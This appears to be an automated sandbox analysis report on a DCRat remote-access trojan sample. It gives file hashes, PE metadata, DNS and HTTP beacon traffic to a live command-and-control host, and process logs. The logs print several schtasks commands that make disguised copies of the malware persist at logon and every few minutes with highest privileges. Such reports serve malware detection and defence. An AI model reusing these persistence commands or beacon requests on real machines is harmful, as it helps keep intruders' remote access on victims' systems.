                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                MD5:12C61586CD59AA6F2A21DF30501F71BD
                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                Malicious:false
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                Process:C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):1281
                Entropy (8bit):5.370111951859942
                Encrypted:false
                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                MD5:12C61586CD59AA6F2A21DF30501F71BD
                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                Malicious:false
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1915
                Entropy (8bit):5.363869398054153
                Encrypted:false
                SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkt1Jtpaq2
                MD5:E6E3A2B5063C33228E2749DC291A1D3D
                SHA1:F3F32E2F204DE9AFA50D5DE1C132A8039C5A315C
                SHA-256:2F6BA7ECDDEF02B291DEA6E03ADD8A30A67B8DE1B7E256FA99B14A28AB9BE831
                SHA-512:15EF30345C2F08AD858A9E5C10CD309F00D1951E4A4902CE8F8700A2B0A25FCFADCFCDA6D13EC7B215B0AF1AB24C8956033E93A403178ED7A98138476D4F9967
                Malicious:true
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                Process:C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1673
                Entropy (8bit):5.358592927981826
                Encrypted:false
                SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHpHNpv:iq+wmj0qCYqGSI6oPtzHeqKkt1Jtpv
                MD5:3FA79285624FEE3EDA6CADAE6686B2D7
                SHA1:B4FCD984A014AF609AA60902FAB53EFE05F72D26
                SHA-256:941DC770C2B1ECCBFE753CE22846C885C111EEBF38B74991B54B2D32D5D46466
                SHA-512:2E5B2FC80CAEFCB6D615CC50E4A9250F2A46AFD406720DF016A55AAB09B2EE63A2AED9E7C6832DD6B93318FEFE99EC21D7264207467A764BE078B2226A9002B2
                Malicious:false
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):2403328
                Entropy (8bit):7.606495823005762
                Encrypted:false
                SSDEEP:49152:2QZEVRb3qgQujSIZijBW7vrGGzt2q5je54Ng3q1qrFBZT4:2GEVRagQujSei5GpZJCmqrZT
                MD5:97177514CAB51539083EF130F005BBD1
                SHA1:49E2661EE3E8F6FD6B06334B00543590ED8FE208
                SHA-256:500A74281DE1BC8E6EB4E08EB8705235F4436CCB209ECACA91FE4AD43A869015
                SHA-512:7CE6E7255D482B7C78F759098F9744F5F0EF462A79AD061D19F8036061B807963C924665BBE66E23E26A36990B5849D527B750AB6D0E9F6010CF4D665EC3D897
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 79%
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:true
                Preview:[ZoneTransfer]....ZoneId=0
                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Entropy (8bit):7.606495823005762
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                • Win32 Executable (generic) a (10002005/4) 49.75%
                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                • Windows Screen Saver (13104/52) 0.07%
                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                File name:oFAjWuoHBq.exe
                File size:2'403'328 bytes
                MD5:97177514cab51539083ef130f005bbd1
                SHA1:49e2661ee3e8f6fd6b06334b00543590ed8fe208
                SHA256:500a74281de1bc8e6eb4e08eb8705235f4436ccb209ecaca91fe4ad43a869015
                SHA512:7ce6e7255d482b7c78f759098f9744f5f0ef462a79ad061d19f8036061b807963c924665bbe66e23e26a36990b5849d527b750ab6d0e9f6010cf4d665ec3d897
                SSDEEP:49152:2QZEVRb3qgQujSIZijBW7vrGGzt2q5je54Ng3q1qrFBZT4:2GEVRagQujSei5GpZJCmqrZT
                TLSH:7CB5CF017E54CE11F00A1633C2FF454847B0AA526AE6E32B7DBA376E59123A77D0D9CB
                Icon Hash:00928e8e8686b000
                Entrypoint:0x64904e
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Time Stamp:0x6272A3D7 [Wed May 4 16:03:35 2022 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                Instruction
                jmp dword ptr [00402000h]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x249000 | 0x4b | .text
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24e000 | 0x218 | .rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x250000 | 0xc | .reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                .text | 0x2000 | 0x247054 | 0x247200 | 14204a8ae2ac9299e9fea882b26ef065 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .sdata | 0x24a000 | 0x2fdf | 0x3000 | e0e63c73a55b3acd14d0b8c7be7da9c4 | False | 0.310302734375 | data | 3.2419636848482156 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc | 0x24e000 | 0x218 | 0x400 | eafc2a00adaec2fc1b7a2e08caf971f9 | False | 0.263671875 | data | 1.8371269699553323 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc | 0x250000 | 0xc | 0x200 | 946f5dd2d8e02a8d9e5e6af66d07621d | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                RT_VERSION | 0x24e058 | 0x1c0 | ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970 | English | United States | 0.5223214285714286
                DLL | Import
                mscoree.dll | _CorExeMain
                Language of compilation system | Country where language is spoken
                English | United States
                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                2024-12-29T03:37:02.276316+0100 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.5 | 49704 | 5.101.152.15 | 80 | TCP
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Dec 29, 2024 03:37:00.716665983 CET | 49704 | 80 | 192.168.2.5 | 5.101.152.15
                Dec 29, 2024 03:37:00.836255074 CET | 80 | 49704 | 5.101.152.15 | 192.168.2.5
                Dec 29, 2024 03:37:00.836334944 CET | 49704 | 80 | 192.168.2.5 | 5.101.152.15
                Dec 29, 2024 03:37:00.837323904 CET | 49704 | 80 | 192.168.2.5 | 5.101.152.15
                Dec 29, 2024 03:37:00.956841946 CET | 80 | 49704 | 5.101.152.15 | 192.168.2.5
                Dec 29, 2024 03:37:02.226448059 CET | 80 | 49704 | 5.101.152.15 | 192.168.2.5
                Dec 29, 2024 03:37:02.276315928 CET | 49704 | 80 | 192.168.2.5 | 5.101.152.15
                Dec 29, 2024 03:37:02.539442062 CET | 49704 | 80 | 192.168.2.5 | 5.101.152.15
                Dec 29, 2024 03:37:02.659116030 CET | 80 | 49704 | 5.101.152.15 | 192.168.2.5
                Dec 29, 2024 03:37:02.991574049 CET | 80 | 49704 | 5.101.152.15 | 192.168.2.5
                Dec 29, 2024 03:37:03.002335072 CET | 49704 | 80 | 192.168.2.5 | 5.101.152.15
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Dec 29, 2024 03:36:59.811018944 CET | 52793 | 53 | 192.168.2.5 | 1.1.1.1
                Dec 29, 2024 03:37:00.709100962 CET | 53 | 52793 | 1.1.1.1 | 192.168.2.5
                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                Dec 29, 2024 03:36:59.811018944 CET | 192.168.2.5 | 1.1.1.1 | 0x7192 | Standard query (0) | ilusharx.beget.tech | A (IP address) | IN (0x0001) | false
                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                Dec 29, 2024 03:37:00.709100962 CET | 1.1.1.1 | 192.168.2.5 | 0x7192 | No error (0) | ilusharx.beget.tech | | 5.101.152.15 | A (IP address) | IN (0x0001) | false
                • ilusharx.beget.tech
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.5 | 49704 | 5.101.152.15 | 80 | 3168 | C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe
                Timestamp | Bytes transferred | Direction | Data
                Dec 29, 2024 03:37:00.837323904 CET | 529 | OUT | GET /L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs&fbdc095920eed7fe5378fd9780be0e0a=47dab7f8a2c15c1fd2e204c0c349ace4&81b054570c653cf3a87ad4218ba78d8d=AMkBDZhRTZzADN2E2NxETN0EmN5AjY1QmMiRjNxUzNxYTOzIDZyMmN&TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs HTTP/1.1
                Accept: */*
                Content-Type: text/css
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                Host: ilusharx.beget.tech
                Connection: Keep-Alive
                Dec 29, 2024 03:37:02.226448059 CET | 546 | IN | HTTP/1.1 200 OK
                Server: nginx-reuseport/1.21.1
                Date: Sun, 29 Dec 2024 02:37:01 GMT
                Content-Type: text/html
                Content-Length: 274
                Last-Modified: Tue, 19 Nov 2024 06:24:41 GMT
                Connection: keep-alive
                Keep-Alive: timeout=30
                ETag: "673c2f29-112"
                Accept-Ranges: bytes
                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>
                Dec 29, 2024 03:37:02.539442062 CET | 505 | OUT | GET /L1nc0In.php?TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs&fbdc095920eed7fe5378fd9780be0e0a=47dab7f8a2c15c1fd2e204c0c349ace4&81b054570c653cf3a87ad4218ba78d8d=AMkBDZhRTZzADN2E2NxETN0EmN5AjY1QmMiRjNxUzNxYTOzIDZyMmN&TciV0oSUjcRBFrjfuSR=q3Dpx6qZUo2j6fKMQZTFjAn9O&481q3gdq2ZZ2i383A5jrFjh=PU8MMqPDbFCs HTTP/1.1
                Accept: */*
                Content-Type: text/css
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                Host: ilusharx.beget.tech
                Dec 29, 2024 03:37:02.991574049 CET | 546 | IN | HTTP/1.1 200 OK
                Server: nginx-reuseport/1.21.1
                Date: Sun, 29 Dec 2024 02:37:02 GMT
                Content-Type: text/html
                Content-Length: 274
                Last-Modified: Tue, 19 Nov 2024 06:24:41 GMT
                Connection: keep-alive
                Keep-Alive: timeout=30
                ETag: "673c2f29-112"
                Accept-Ranges: bytes
                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>



                Target ID:0
                Start time:21:36:53
                Start date:28/12/2024
                Path:C:\Users\user\Desktop\oFAjWuoHBq.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\user\Desktop\oFAjWuoHBq.exe"
                Imagebase:0x5d0000
                File size:2'403'328 bytes
                MD5 hash:97177514CAB51539083EF130F005BBD1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2030805631.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2030805631.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2030805631.0000000002EBC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2033527159.0000000012BCF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true

                Target ID:2
                Start time:21:36:55
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe'" /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:3
                Start time:21:36:55
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe'" /rl HIGHEST /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:4
                Start time:21:36:55
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe'" /rl HIGHEST /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:5
                Start time:21:36:55
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 9 /tr "'C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:6
                Start time:21:36:55
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgO" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:7
                Start time:21:36:55
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 7 /tr "'C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:8
                Start time:21:36:56
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:9
                Start time:21:36:56
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgO" /sc ONLOGON /tr "'C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:10
                Start time:21:36:56
                Start date:28/12/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "tcEcURjxxClvKHXzINDGbUbctpEdgOt" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe'" /rl HIGHEST /f
                Imagebase:0x7ff75ca00000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true
